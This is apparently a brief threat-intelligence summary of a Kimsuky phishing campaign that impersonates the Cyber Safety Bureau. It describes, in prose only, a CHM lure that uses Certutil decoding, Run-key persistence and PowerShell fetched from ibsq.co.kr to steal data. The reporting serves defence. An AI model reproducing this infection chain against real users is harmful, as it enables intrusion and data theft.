ESRC attributes a Korean phishing campaign to Kimsuky, targeting people connected to North Korea-related organizations with email impersonating the Cyber Safety Bureau. The lure claimed the recipient faced legal or account-abuse issues and attached an archive containing a CHM file named for information-network law; running it displayed benign help content while executing a background Click() script. The script stored encoded commands in Document.dat, used Certutil to decode them into Document.vbs, registered persistence through the Run key, and executed PowerShell from ibsq.co.kr to steal user information. The report notes North Korean wording in the email body and lists hashes plus ibsq.co.kr URLs as representative indicators.